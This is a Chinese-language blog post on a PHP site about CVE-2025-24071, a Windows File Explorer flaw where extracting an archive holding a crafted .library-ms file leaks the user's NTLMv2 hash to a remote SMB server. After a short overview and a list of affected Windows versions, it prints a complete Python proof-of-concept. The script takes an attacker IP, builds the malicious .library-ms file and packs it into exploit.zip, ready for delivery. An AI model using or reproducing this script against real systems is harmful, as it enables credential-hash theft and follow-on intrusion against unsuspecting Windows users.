CVE-2025-24071｜Windows 文件资源管理器欺骗漏洞（POC）-Windows系列-PHP中文网

CVE-2025-24071｜Windows 文件资源管理器欺骗漏洞（POC）

星夢妙者

发布： 2025-09-10 08:57:19

原创

628人浏览过

cve-2025-24071｜windows 文件资源管理器欺骗漏洞（poc）

0x00 前言

Windows 文件资源管理器（File Explorer）作为Windows系统的关键组成部分，承担着管理与访问本地及网络文件资源的核心职能。它提供用户友好的图形界面，支持文件的浏览、复制、移动、删除、重命名等基本操作，同时集成了网络共享、外部设备识别、文件搜索与过滤等高级功能，是日常多任务文件处理不可或缺的工具。

0x01 漏洞概述

当用户使用Windows资源管理器解压含有恶意构造的

.library-ms

登录后复制

文件的ZIP或RAR压缩包时，系统会自动解析该文件中嵌入的SMB路径（例如：\192.168.1.116shared），进而触发向远程服务器发起NTLM身份验证请求，造成用户的NTLMv2哈希值在无交互情况下被泄露。

0x02 CVE编号

CVE-2025-24071

0x03 受影响版本

晓象AI资讯阅读神器

晓象-AI时代的资讯阅读神器

查看详情

Windows Server 2012 R2 (Server Core installation)Windows Server 2012 R2Windows Server 2016 (Server Core installation)Windows Server 2016Windows 10 Version 1607 for x64-based SystemsWindows 10 Version 1607 for 32-bit SystemsWindows 10 for x64-based SystemsWindows 10 for 32-bit SystemsWindows Server 2025Windows 11 Version 24H2 for x64-based SystemsWindows 11 Version 24H2 for ARM64-based SystemsWindows Server 2022, 23H2 Edition (Server Core installation)Windows 11 Version 23H2 for x64-based SystemsWindows 11 Version 23H2 for ARM64-based SystemsWindows Server 2025 (Server Core installation)Windows 10 Version 22H2 for 32-bit SystemsWindows 10 Version 22H2 for ARM64-based SystemsWindows 10 Version 22H2 for x64-based SystemsWindows 11 Version 22H2 for x64-based SystemsWindows 11 Version 22H2 for ARM64-based SystemsWindows 10 Version 21H2 for x64-based SystemsWindows 10 Version 21H2 for ARM64-based SystemsWindows 10 Version 21H2 for 32-bit SystemsWindows Server 2022 (Server Core installation)Windows Server 2022Windows Server 2019 (Server Core installation)Windows Server 2019Windows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems

登录后复制

0x04 漏洞利用示例（POC）

项目地址：

https://www.php.cn/link/35f4421c476ab29bd7492717ccb0642c

import os
import zipfile

def main():
    file_name = input("Enter your file name: ")
    ip_address = input("Enter IP (EX: 192.168.1.162): ")
    library_content = f"""<?xml version="1.0" encoding="UTF-8"?>
<librarydescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchconnectordescriptionlist>
    <searchconnectordescription>
      <simplelocation>
        <url>\\{ip_address}\shared</url>
      </simplelocation>
    </searchconnectordescription>
  </searchconnectordescriptionlist>
</librarydescription>"""
    library_file_name = f"{file_name}.library-ms"
    with open(library_file_name, "w", encoding="utf-8") as f:
        f.write(library_content)
    with zipfile.ZipFile("exploit.zip", mode="w", compression=zipfile.ZIP_DEFLATED) as zipf:
        zipf.write(library_file_name)
    if os.path.exists(library_file_name):
        os.remove(library_file_name)
    print("completed")

if __name__ == "__main__":
    main()

登录后复制

0x05 参考资料

https://www.php.cn/link/f08f86e95c9d083c89f058285f9ff636

以上就是CVE-2025-24071｜Windows 文件资源管理器欺骗漏洞（POC）的详细内容，更多请关注php中文网其它相关文章！